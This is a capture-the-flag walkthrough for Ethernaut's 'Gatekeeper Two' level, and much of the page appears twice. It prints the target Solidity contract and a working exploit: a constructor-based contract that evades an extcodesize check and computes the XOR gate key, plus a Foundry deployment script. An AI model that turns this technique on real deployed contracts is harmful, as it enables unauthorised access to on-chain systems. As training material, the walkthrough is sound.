Level 14 - Gatekeeper 2 ⏺⏺⏺

Last updated 8 months ago

Level 14 - Gatekeeper 2 ⏺⏺⏺

Level Setup

This gatekeeper introduces a few new challenges. Register as an entrant to pass this level.

Things that might help:

Remember what you've learned from getting past the first gatekeeper - the first gate is the same.
The assembly keyword in the second gate allows a contract to access functionality that is not native to vanilla Solidity. See for more information. The extcodesize call in this gate will get the size of a contract's code at a given address - you can learn more about how and when this is set in section 7 of the .
The ^ character in the third gate is a bitwise operation (XOR), and is used here to apply another common bitwise operation (see ). The Coin Flip level is also a good place to start when approaching this challenge.

Level Contract

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract GatekeeperTwo {
    address public entrant;

    modifier gateOne() {
        require(msg.sender != tx.origin);
        _;
    }

    modifier gateTwo() {
        uint256 x;
        assembly {
            x := extcodesize(caller())
        }
        require(x == 0);
        _;
    }

    modifier gateThree(bytes8 _gateKey) {
        require(uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) ^ uint64(_gateKey) == type(uint64).max);
        _;
    }

    function enter(bytes8 _gateKey) public gateOne gateTwo gateThree(_gateKey) returns (bool) {
        entrant = tx.origin;
        return true;
    }
}

Exploit

make anvil-exploit-level-14

<INPUT_LEVEL_INSTANCE_CONTRACT_ADDRESS>

make holesky-exploit-level-14

<INPUT_LEVEL_INSTANCE_CONTRACT_ADDRESS>

src/Level14.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {Script, console} from "forge-std/Script.sol";

// ================================================================
// │                    LEVEL 14 - GATEKEEPER TWO                 │
// ================================================================
contract GatekeeperTwoMiddleman {
    constructor(address targetContract) {
        bytes8 key = bytes8(uint64(bytes8(keccak256(abi.encodePacked(address(this))))) ^ uint64(0xffffffffffffffff));
        (bool success,) = address(targetContract).call(abi.encodeWithSignature("enter(bytes8)", key));
        require(success);
    }
}

script/Level14.s.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {Script, console} from "forge-std/Script.sol";
import {HelperFunctions} from "script/HelperFunctions.s.sol";

import {GatekeeperTwoMiddleman} from "../src/Level14.sol";

// ================================================================
// │                    LEVEL 14 - GATEKEEPER TWO                 │
// ================================================================
contract Exploit is Script, HelperFunctions {
    function run() public {
        address targetContractAddress = getInstanceAddress();

        vm.startBroadcast();
        new GatekeeperTwoMiddleman(targetContractAddress);
        vm.stopBroadcast();
    }
}

Submit instance... 🥳

Completion Message

Notes

Last updated 8 months ago

Level Setup

This gatekeeper introduces a few new challenges. Register as an entrant to pass this level.

Things that might help:

Remember what you've learned from getting past the first gatekeeper - the first gate is the same.
The assembly keyword in the second gate allows a contract to access functionality that is not native to vanilla Solidity. See for more information. The extcodesize call in this gate will get the size of a contract's code at a given address - you can learn more about how and when this is set in section 7 of the .
The ^ character in the third gate is a bitwise operation (XOR), and is used here to apply another common bitwise operation (see ). The Coin Flip level is also a good place to start when approaching this challenge.

Level Contract

ethernaut/contracts/src/levels/GatekeeperTwo.sol at a89c8f7832258655c09fde16e6602c78e5e99dbd · OpenZeppelin/ethernautGitHub

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract GatekeeperTwo {
    address public entrant;

    modifier gateOne() {
        require(msg.sender != tx.origin);
        _;
    }

    modifier gateTwo() {
        uint256 x;
        assembly {
            x := extcodesize(caller())
        }
        require(x == 0);
        _;
    }

    modifier gateThree(bytes8 _gateKey) {
        require(uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) ^ uint64(_gateKey) == type(uint64).max);
        _;
    }

    function enter(bytes8 _gateKey) public gateOne gateTwo gateThree(_gateKey) returns (bool) {
        entrant = tx.origin;
        return true;
    }
}

Exploit

make anvil-exploit-level-14

<INPUT_LEVEL_INSTANCE_CONTRACT_ADDRESS>

make holesky-exploit-level-14

<INPUT_LEVEL_INSTANCE_CONTRACT_ADDRESS>

ethernaut-foundry/src/Level14.sol at 7851977141ce27a4cb0f3eda16209208b7a1c779 · EridianAlpha/ethernaut-foundryGitHub

src/Level14.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {Script, console} from "forge-std/Script.sol";

// ================================================================
// │                    LEVEL 14 - GATEKEEPER TWO                 │
// ================================================================
contract GatekeeperTwoMiddleman {
    constructor(address targetContract) {
        bytes8 key = bytes8(uint64(bytes8(keccak256(abi.encodePacked(address(this))))) ^ uint64(0xffffffffffffffff));
        (bool success,) = address(targetContract).call(abi.encodeWithSignature("enter(bytes8)", key));
        require(success);
    }
}

ethernaut-foundry/script/Level14.s.sol at 7851977141ce27a4cb0f3eda16209208b7a1c779 · EridianAlpha/ethernaut-foundryGitHub

script/Level14.s.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {Script, console} from "forge-std/Script.sol";
import {HelperFunctions} from "script/HelperFunctions.s.sol";

import {GatekeeperTwoMiddleman} from "../src/Level14.sol";

// ================================================================
// │                    LEVEL 14 - GATEKEEPER TWO                 │
// ================================================================
contract Exploit is Script, HelperFunctions {
    function run() public {
        address targetContractAddress = getInstanceAddress();

        vm.startBroadcast();
        new GatekeeperTwoMiddleman(targetContractAddress);
        vm.stopBroadcast();
    }
}

Submit instance... 🥳

Completion Message

Way to go! Now that you can get past the gatekeeper, you have what it takes to join , a decentralized club on the Ethereum mainnet. Get a passphrase by contacting the creator on or via and use it to register with the contract at (be aware that only the first 128 entrants will be accepted by the contract).

Notes

ethernaut-openzeppelin-hacks/level_14_Gatekeeper-Two.md at e936301859334383d568a614084917100319205e · nvnx7/ethernaut-openzeppelin-hacksGitHub